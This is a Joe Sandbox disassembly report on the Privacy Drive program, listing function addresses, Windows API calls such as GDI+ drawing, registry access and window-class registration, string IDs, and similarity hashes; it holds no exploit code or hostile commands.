                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 004195F1
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419628
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,42B3FFFF,?,?,?), ref: 0041965E
                                  • Part of subcall function 004195B0: GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419683
                                  • Part of subcall function 004195B0: GdipClosePathFigure.GDIPLUS(00000000), ref: 0041968E
                                • GdipCreatePathGradientFromPath.GDIPLUS(00000000,?), ref: 00433592
                                  • Part of subcall function 004193F0: GdipSetPathGradientPresetBlend.GDIPLUS(?,00000000,?,00000004), ref: 00419443
                                • GdipSetPathGradientFocusScales.GDIPLUS(?), ref: 004335FC
                                • GdipFillPath.GDIPLUS(?,?,00000000), ref: 00433616
                                • GdipDeleteBrush.GDIPLUS(?), ref: 0043362F
                                • GdipDeletePath.GDIPLUS(00000000), ref: 0043363F
                                Similarity
                                • API ID: GdipPath$Gradient$CreateDelete$BlendBrushCloseFigureFillFocusFromPresetResetScales
                                • String ID:
                                • API String ID: 1027064271-0
                                • Opcode ID: 96a32a6726cf0e7462fda4e4e2d1581cbc6da21a1256417115460b718b87573e
                                • Instruction ID: 3193731d80dc03a79ec8f495aeb0e55a02c248bd65a2315c1844a197df9a6016
                                • Instruction Fuzzy Hash: 13417771D0124CEFDB01DFA5D945BDEBBB8FF59314F10421AE811A7290EB306A89CB90
                                APIs
                                • GdipCreatePen1.GDIPLUS(?,?,00000000,?,7563D392), ref: 004268D0
                                • GdipSetPenDashArray.GDIPLUS(00000000,40000000,00000002), ref: 004268E9
                                • GdipDrawLine.GDIPLUS(00000000,?), ref: 0042693C
                                • GdipSetPenColor.GDIPLUS(?,64FFFFFF), ref: 00426951
                                • GdipDrawLine.GDIPLUS(00000000,?), ref: 0042699E
                                • GdipDeletePen.GDIPLUS(?), ref: 004269B5
                                Similarity
                                • API ID: Gdip$DrawLine$ArrayColorCreateDashDeletePen1
                                • String ID:
                                • API String ID: 2420209806-0
                                • Opcode ID: 88626d40c6255a05d4940b8dc963fcfb8880ce726fc1f4404bdc206c21d00123
                                • Instruction ID: 9873abff9a08ba6f93b20aaffb79cb3ca0c1a085dadd2560cc221db21d384360
                                • Instruction Fuzzy Hash: 3A412A71A1470AEFDB01DF65C845AAEFBB4FF59250F10831AE815A32A0E731A851DB90
                                APIs
                                • GdipCreatePen1.GDIPLUS(?,?,00000000,?,7563D392), ref: 00419A52
                                • GdipSetPenDashArray.GDIPLUS(00000000,40000000,00000002), ref: 00419A6B
                                • GdipDrawLine.GDIPLUS(00000000,?), ref: 00419AB5
                                • GdipSetPenColor.GDIPLUS(?,?), ref: 00419ACA
                                • GdipDrawLine.GDIPLUS(00000000,?), ref: 00419B11
                                • GdipDeletePen.GDIPLUS(?), ref: 00419B28
                                Similarity
                                • API ID: Gdip$DrawLine$ArrayColorCreateDashDeletePen1
                                • String ID:
                                • API String ID: 2420209806-0
                                • Opcode ID: d37cb8e4f82ef219d03973394140a9d4c6849fb66b1d352c36181dedd20040b4
                                • Instruction ID: ee8cb62ab2451e0828500fc1fe84e794faf17f67ca449c772ab1fb62a3a8d302
                                • Instruction Fuzzy Hash: 4A416971A0470AEFDB01DFA5CC45BAEBBB4FF89350F10862AE415A32A0E730A950DF51
                                APIs
                                • GdipResetPath.GDIPLUS(00000000,?,?,7348BEC0,00000000,?,004172AC,00000003,?,?,00000001), ref: 004195C5
                                • GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 004195F1
                                • GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419628
                                • GdipAddPathArcI.GDIPLUS(00000000,42B3FFFF,?,?,?), ref: 0041965E
                                • GdipAddPathArcI.GDIPLUS(00000000,?,?,?,?), ref: 00419683
                                • GdipClosePathFigure.GDIPLUS(00000000), ref: 0041968E
                                Similarity
                                • API ID: GdipPath$CloseFigureReset
                                • String ID:
                                • API String ID: 1165678104-0
                                • Opcode ID: 9b456eee7caa8cd7400d12114530425a58d208804b994febc350a3e22252b5df
                                • Instruction ID: d2abe810883e9127a5072a582f8e754f657d44ff77088b5ba8e8c91eca39bea1
                                • Instruction Fuzzy Hash: C1314A71504209EFDB209F69DE64AABBFF9EF44745F10842DF88887610D732E910EB60
                                APIs
                                • GdipCreateFontFamilyFromName.GDIPLUS(0042A076,00000000), ref: 0042B8A3
                                • GdipGetGenericFontFamilySansSerif.GDIPLUS(005BD8A8), ref: 0042B8E0
                                • GdipCreateFont.GDIPLUS(00000000,?,?,00000002,00000000), ref: 0042B90D
                                • GdipGetGenericFontFamilySansSerif.GDIPLUS(005BD8A8,?,?,00000002,00000000), ref: 0042B933
                                • GdipCreateFont.GDIPLUS(?,?,?,00000002,00000000,?,?,00000002,00000000), ref: 0042B960
                                • GdipDeleteFontFamily.GDIPLUS(00000000,?,?,00000002,00000000), ref: 0042B973
                                Similarity
                                • API ID: FontGdip$Family$Create$GenericSansSerif$DeleteFromName
                                • String ID:
                                • API String ID: 2842780952-0
                                • Opcode ID: 1317ae90b54967c85b75c1f9773daaad309c86fd4e35f64feb8aee5a7dc3f866
                                • Instruction ID: 44efaea698091796832b34f7aba718d91fc3679415ee51dfa0ecb132b2631af9
                                • Instruction Fuzzy Hash: 8E318BB5A00305EFDB14DF55E854B6ABBF4FB0A711F10822EF951A7390E735A904DBA0
                                APIs
                                Strings
                                Similarity
                                • API ID: _memmove
                                • String ID: t=X$t=X
                                • API String ID: 4104443479-1178391202
                                • Opcode ID: 79a9f8eebf31098dbf47203287711b78fd87398bf3c147cf498bd59d48a32082
                                • Instruction ID: 576e28fcdbd6255d9ee24f4616a54731efba306f999c106dd8af0492228bc50d
                                • Instruction Fuzzy Hash: B2A17F71204605BBDB14DF21CC45FDBBBE9FF89744F04051ABA58CA290EB34E954CBA6
                                APIs
                                • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,7563D392,0040FFE5,005BE234,?,00000000,0054AA91,000000FF,?,004B2304), ref: 004B493D
                                • RegQueryValueExW.ADVAPI32(00000000,?,00000000,?,00000000,?,0054AA91,000000FF,?,004B2304,?,?,005BE234,?,0040FFE5,005BE28C), ref: 004B49BC
                                • _memmove.LIBCMT ref: 004B4B95
                                Strings
                                Similarity
                                • API ID: QueryValue$_memmove
                                • String ID: ProgramVerify.cpp$aes
                                • API String ID: 105235180-4043292328
                                • Opcode ID: fe84bf6162802b2620aff083837fbc25075e08b544c2c5f19fe12840beed64c6
                                • Instruction ID: d9ba1fa1d14e7f405cab6b5400da9796704bace275dc7e0dd889cf08e4c9ef6b
                                • Instruction Fuzzy Hash: A8A1B571900219ABDB20DB64CD4AFDEB7B4BF54704F0041A9F628A6292D734BE90DF65
                                APIs
                                • RegSetValueExW.ADVAPI32(00000000,?,00000000,00000003,?,00000288,?,00000288,?,00000000,00000000), ref: 004B4853
                                Strings
                                Similarity
                                • API ID: Value
                                • String ID: !@$%sPortable.xml$aes$t=X
                                • API String ID: 3702945584-2174588135
                                • Opcode ID: 79fb52621954d3fb78e543622caf05ed8ea85ff9978e277aaa43c95a22e0e1da
                                • Instruction ID: 25f4ce58266ebb0ed9df831637feb6a591a22c29c147037c3482931c5dc3d598
                                • Instruction Fuzzy Hash: 869188709103589EEB20EF54CC49BDEBBB4BF45718F504199E508BB282D7745B84CFA6
                                APIs
                                • GetWindowRect.USER32(00000000), ref: 00437BDD
                                • SetWindowPos.USER32(00000000), ref: 00437C00
                                  • Part of subcall function 00439B20: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00439B58
                                • SetWindowPos.USER32(00000000), ref: 00437DB1
                                • ShowWindow.USER32(00000000), ref: 00437DBD
                                Strings
                                Similarity
                                • API ID: Window$Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exceptionRectShow
                                • String ID: 4[
                                • API String ID: 2853482114-2135906705
                                • Opcode ID: 84b63916d7adf2e67d32986b7a000f2952426d7115598657cef8e05939c4c294
                                • Instruction ID: f88acbd0015810147a0396ce29eb217f2978efc4e893c482084cd6a8c9b6fe4c
                                • Opcode Fuzzy Hash: 84b63916d7adf2e67d32986b7a000f2952426d7115598657cef8e05939c4c294
                                • Instruction Fuzzy Hash: 5461A370204301DFD764EF28C859BAABBE5FF88314F10596EF5968B3A1DB78A804CB55
                                APIs
                                  • Part of subcall function 00403950: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 0040398C
                                • EnterCriticalSection.KERNEL32(005BE2CC,?,?,?,?,?,?,00000000,00000000), ref: 004A766C
                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 004A773A
                                  • Part of subcall function 004A6B80: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6BCC
                                  • Part of subcall function 004A6B80: DeviceIoControl.KERNEL32(?,07770C34,00000000,00000000,00000000,00004186,7563D392,00000000), ref: 004A6BE6
                                  • Part of subcall function 004A6B80: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C0D
                                  • Part of subcall function 004A6B80: PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004A6C31
                                  • Part of subcall function 004A6B80: EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6C84
                                  • Part of subcall function 004A6B80: LeaveCriticalSection.KERNEL32(005BE2CC,?), ref: 004A6C97
                                  • Part of subcall function 004A6B80: EnterCriticalSection.KERNEL32(005BE2CC), ref: 004A6CC0
                                  • Part of subcall function 004A6B80: LeaveCriticalSection.KERNEL32(005BE2CC), ref: 004A6CCD
                                • EnumWindows.USER32(Function_00001500,?), ref: 004A778D
                                • EnumWindows.USER32(004A7820,?), ref: 004A7799
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeaveMessagePeek$EnumWindows$Concurrency::details::_Concurrent_queue_base_v4::_ControlDeviceInternal_throw_exception
                                • String ID: list<T> too long
                                • API String ID: 3016200981-4027344264
                                • Opcode ID: 5b1af98e30a764c033c028efd539e04e818c7ec6fbb095fcb2a916587c88fa69
                                • Instruction ID: 56bc04989fab07b3bb9b6566eda9424b4fbee7646f229446e837d79c6703114c
                                • Opcode Fuzzy Hash: 5b1af98e30a764c033c028efd539e04e818c7ec6fbb095fcb2a916587c88fa69
                                • Instruction Fuzzy Hash: 956199B46087018FC720DF28C884A5ABBE4FF9A714F14466EF959CB361D738E944CB96
                                APIs
                                  • Part of subcall function 0040E530: _memmove.LIBCMT ref: 0040E5A4
                                • SHChangeNotify.SHELL32(08000000,00001000,00000000,00000000), ref: 0040D7DD
                                  • Part of subcall function 00401C40: _memmove.LIBCMT ref: 00401CCA
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove$ChangeNotify
                                • String ID: !@$%s%s$Privacy Drive$pdv.ico
                                • API String ID: 1880328021-1887578971
                                • Opcode ID: 197c7df9783695546f8ec353bc5f4195fb4fcdb933b5f6b49561bf1dbda42f9e
                                • Instruction ID: a484dc032fc2894d9f904c88144a76d52c1ebb910f2420f10820118e3c17c107
                                • Opcode Fuzzy Hash: 197c7df9783695546f8ec353bc5f4195fb4fcdb933b5f6b49561bf1dbda42f9e
                                • Instruction Fuzzy Hash: BA811570D04248EEDF10DFE9C959BDEBBB0BF14318F204529E014B7291D7B92A48CBA6
                                APIs
                                • RegCloseKey.ADVAPI32(?,7563D392), ref: 004B511E
                                • RegCreateKeyExW.ADVAPI32(80000001,Software\Cybertron\Privacy Drive,?,?,?,0002001F,?,005BE250,00000000,7563D392), ref: 004B5145
                                • RegCloseKey.ADVAPI32(00000000), ref: 004B5223
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Close$Create
                                • String ID: 4[$Software\Cybertron\Privacy Drive
                                • API String ID: 359002179-1004237525
                                • Opcode ID: 1d4b454dd639f5500d250ce712c737f673ec46d4253e1cfd212f116c70e7db5e
                                • Instruction ID: 7fc5252bc8dff4fcc8be655ec8b191145f753d9561629634891003532d1dffe7
                                • Opcode Fuzzy Hash: 1d4b454dd639f5500d250ce712c737f673ec46d4253e1cfd212f116c70e7db5e
                                • Instruction Fuzzy Hash: 09519570A00219AFEB24DF65CC45BAEBBB4FB04704F1041AEE405A73C2E7B56948CF64
                                APIs
                                • LoadCursorW.USER32(00000000,00007F00), ref: 004304BD
                                • RegisterClassExW.USER32(00000030), ref: 004304E6
                                • __CxxThrowException@8.LIBCMT ref: 00430501
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ClassCursorExceptionException@8LoadRaiseRegisterThrow
                                • String ID: 0$T@W
                                • API String ID: 124629159-647002828
                                • Opcode ID: ecc3f5c7a7f9f0bdd00b6177ce578745c6a1a0604df76345d6ebbd26b85f8c7e
                                • Instruction ID: ce70b3ebfc1e80b7253cdaebd5798b6749c21fb3ed692d023f7c27f5bbe3783a
                                • Opcode Fuzzy Hash: ecc3f5c7a7f9f0bdd00b6177ce578745c6a1a0604df76345d6ebbd26b85f8c7e
                                • Instruction Fuzzy Hash: A561E2B0805388DEEB11CF64C55879ABFF4BF05308F24858DD059AB391D3BA9A0ADF91
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A12FF
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A1317
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A1330
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,0000000A,00000000,?,0000001D,?,FF323232), ref: 004A140B
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$CreateDelete$AlignFillRectangle$BrushDashDrawLinePen1SolidStyle
                                • String ID: @
                                • API String ID: 1390250770-2766056989
                                • Opcode ID: 1487fdf0435f6f3ae28c5813eefbb62a2b686aca0d601e20f29032d52ab73e47
                                • Instruction ID: 14b28f633d388a5baa52ddcafb55058c1eeb352d5ebb892b816658f15592212f
                                • Opcode Fuzzy Hash: 1487fdf0435f6f3ae28c5813eefbb62a2b686aca0d601e20f29032d52ab73e47
                                • Instruction Fuzzy Hash: 58419F75208345AFD714CF14CC45F9BBBE8FB99754F000A2EF955A62E0D770A908CB9A
                                APIs
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A12FF
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A1317
                                • GdipSetStringFormatLineAlign.GDIPLUS(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,00539A78,000000FF), ref: 004A1330
                                  • Part of subcall function 004CBC00: GdipCreateSolidFill.GDIPLUS(?,FFFFFFFF), ref: 004CBC55
                                  • Part of subcall function 004CBC00: GdipFillRectangle.GDIPLUS(?,00000000), ref: 004CBCAB
                                  • Part of subcall function 004CBC00: GdipDeleteBrush.GDIPLUS(00000000), ref: 004CBCC7
                                • GdipDeleteStringFormat.GDIPLUS(00000000,?,0000000A,00000000,?,0000001D,?,FF323232), ref: 004A140B
                                  • Part of subcall function 004CB9E0: GdipCreatePen1.GDIPLUS(7563D392,7563D392,00000000,7563D392), ref: 004CBA22
                                  • Part of subcall function 004CB9E0: GdipSetPenDashStyle.GDIPLUS(00000000,?), ref: 004CBA38
                                  • Part of subcall function 004CB9E0: GdipDrawRectangle.GDIPLUS(?,?), ref: 004CBA8B
                                  • Part of subcall function 004CB9E0: GdipDeletePen.GDIPLUS(?), ref: 004CBAA2
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$CreateDelete$AlignFillRectangle$BrushDashDrawLinePen1SolidStyle
                                • String ID: @
                                • API String ID: 1390250770-2766056989
                                • Opcode ID: df780c9b89806ddd2244de07eae6b77a6dd4d85a52d1d2217e0446241a266bbd
                                • Instruction ID: b7abb43a99e67582e8b9c6702a6cb53732e53b392afc1180374469986e2ec2a6
                                • Opcode Fuzzy Hash: df780c9b89806ddd2244de07eae6b77a6dd4d85a52d1d2217e0446241a266bbd
                                • Instruction Fuzzy Hash: 77418F75208345AFD710CF14CC45F9ABBE8FB99764F10062EF955A62E0D770E908CB9A
                                APIs
                                • LoadCursorW.USER32(00000000), ref: 00417AC6
                                • RegisterClassExW.USER32(00000030), ref: 00417AEF
                                • __CxxThrowException@8.LIBCMT ref: 00417B0A
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ClassCursorExceptionException@8LoadRaiseRegisterThrow
                                • String ID: 0$cbfx_SplashWnd
                                • API String ID: 124629159-3122380756
                                • Opcode ID: 113595fb88b07ce60ec2703353012f5eeacafe8248899689eea7b4a18912b07c
                                • Instruction ID: 9542e0f460d70c1d8dbdb4c5b38097e2f22e6357aca21166d9c86274e27858fe
                                • Opcode Fuzzy Hash: 113595fb88b07ce60ec2703353012f5eeacafe8248899689eea7b4a18912b07c
                                • Instruction Fuzzy Hash: A751D1B0805389DEEB01CF54C95879ABFF4BF06308F248589D0586F291D7BA9A4ACF90
                                APIs
                                • LoadCursorW.USER32(00000000), ref: 004337E0
                                • RegisterClassExW.USER32(00000030), ref: 00433809
                                • __CxxThrowException@8.LIBCMT ref: 00433824
                                  • Part of subcall function 00502BEB: RaiseException.KERNEL32(?,?,7563D392,005A7F20,?,?,?,?,?,004FFD4E,7563D392,005A7F20,?,00000001), ref: 00502C40
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ClassCursorExceptionException@8LoadRaiseRegisterThrow
                                • String ID: 0$cbfx_RegistrationReminderMiniWnd
                                • API String ID: 124629159-1075444511
                                • Opcode ID: 0c4f07d3c3c0b5ac19bb10889e5a2d81d977fdc6205c29ad623ec6d496be10a3
                                • Instruction ID: a3992295d61452cf69781cd4accdc83b249b2407783834dd3bd975dfe31615ae
                                • Opcode Fuzzy Hash: 0c4f07d3c3c0b5ac19bb10889e5a2d81d977fdc6205c29ad623ec6d496be10a3
                                • Instruction Fuzzy Hash: 8351D0B0801349DEEB01CF94D95879ABFF4BF06318F248589D0586F291D7BA9A4ADFD0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
